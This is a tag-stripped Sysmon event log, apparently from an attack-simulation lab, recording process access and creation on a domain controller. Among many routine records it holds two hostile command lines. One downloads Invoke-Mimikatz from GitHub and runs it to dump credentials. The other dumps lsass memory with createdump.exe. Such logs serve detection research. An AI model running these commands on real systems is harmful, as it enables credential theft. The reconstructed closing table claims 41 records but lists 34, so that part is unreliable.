21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.031{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3
504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.035{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000026076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8589A038F58D1715FEDAFDA995B83F4B,SHA256=F91594E955A1970A1EE1A5CAF5ED1FC1BA26F25EDA41AB322BF9D66D51ED069B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.957{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=7AB47AC79E82AFB391077C0193847ED2,SHA256=9CFF697F31268BA26570170E27E186652377C229ECF34094F12ADDC86E6DE702,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.910{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.801{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000026067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.801{4DB9351A-A345-60D3-6306-00000000CF01}36565804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb1147588
9\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000026066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.802{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXE"C:\Windows\system32\findstr.exe" 
lsassC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} 10341000x800000000000000026065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
(continuation of the record whose System header ends the preceding line)

Sysmon Event ID 10 (ProcessAccess) records, EventRecordID 26063 down to 26023 (41 records), reconstructed from the tag-stripped export. System fields common to all of them: EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000, Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-663.attackrange.local. EventData common to all of them (RuleName "-"):

  SourceProcessGUID               {4DB9351A-9DDD-60D3-0C00-00000000CF01}
  SourceProcessId+SourceThreadId  844876 (the tag boundary between the two values was lost in extraction)
  SourceImage                     C:\Windows\system32\svchost.exe
  TargetProcessGUID               {4DB9351A-A346-60D3-6406-00000000CF01}
  TargetProcessId                 388
  TargetImage                     C:\Windows\system32\tasklist.exe
  GrantedAccess                   0x1400
  CallTrace                       C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|<lsm.dll frames from the table below>|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Per-record fields (each lsm.dll frame is c:\windows\system32\lsm.dll+offset, listed in CallTrace order):

  EventRecordID  UtcTime                  lsm.dll frames
  26063          2021-06-23 21:10:30.785  +e9d6 | +1439d
  26062          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26061          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26060          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26059          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26058          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26057          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26056          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26055          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26054          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26053          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26052          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26051          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26050          2021-06-23 21:10:30.785  +1f3a | +1cd9
  26049          2021-06-23 21:10:30.785  +e9d6 | +1c24
  26048          2021-06-23 21:10:30.770  +e9d6 | +157b1
  26047          2021-06-23 21:10:30.770  +1f3a
  26046          2021-06-23 21:10:30.770  +e9d6 | +1439d
  26045          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26044          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26043          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26042          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26041          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26040          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26039          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26038          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26037          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26036          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26035          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26034          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26033          2021-06-23 21:10:30.770  +e9d6 | +157b1
  26032          2021-06-23 21:10:30.770  +1f3a
  26031          2021-06-23 21:10:30.770  +e9d6 | +1439d
  26030          2021-06-23 21:10:30.770  +1f3a | +1cd9
